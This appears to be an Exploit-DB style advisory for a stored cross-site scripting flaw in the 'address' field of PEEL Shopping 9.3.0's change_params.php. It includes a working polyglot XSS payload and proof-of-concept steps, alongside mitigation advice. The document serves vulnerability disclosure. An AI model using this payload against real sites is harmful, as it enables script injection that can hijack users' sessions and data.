PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting

vendor:

PEEL SHOPPING

by:

Anmol K Sachan

5.5

CVSS

MEDIUM

Stored Cross-site Scripting

CWE

Product Name: PEEL SHOPPING

Affected Version From: PEEL SHOPPING 9.3.0

Affected Version To: PEEL SHOPPING 9.3.0

Patch Exists: NO

Related CWE:

CPE: a:peel:shopping:9.3.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 XAMPP

2021

PEEL Shopping 9.3.0 – ‘address’ Stored Cross-Site Scripting

This application is vulnerable to Stored XSS vulnerability. The vulnerability is present in the 'address' parameter of the 'change_params.php' script. An attacker can inject malicious JavaScript code into the address field, which will be executed when a user interacts with the page.

Mitigation:

To mitigate this vulnerability, the application should properly validate and sanitize user input before displaying it on the page. All user-supplied data should be encoded or escaped to prevent the execution of malicious code.

Source

Exploit-DB raw data:

# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: : PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
# Vulnerable parameters: 'Address'
# Payload used: 

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

# POC: in the same page where we injected payload click on the text box to edit the address.
# You will see your Javascript code (XSS) executed.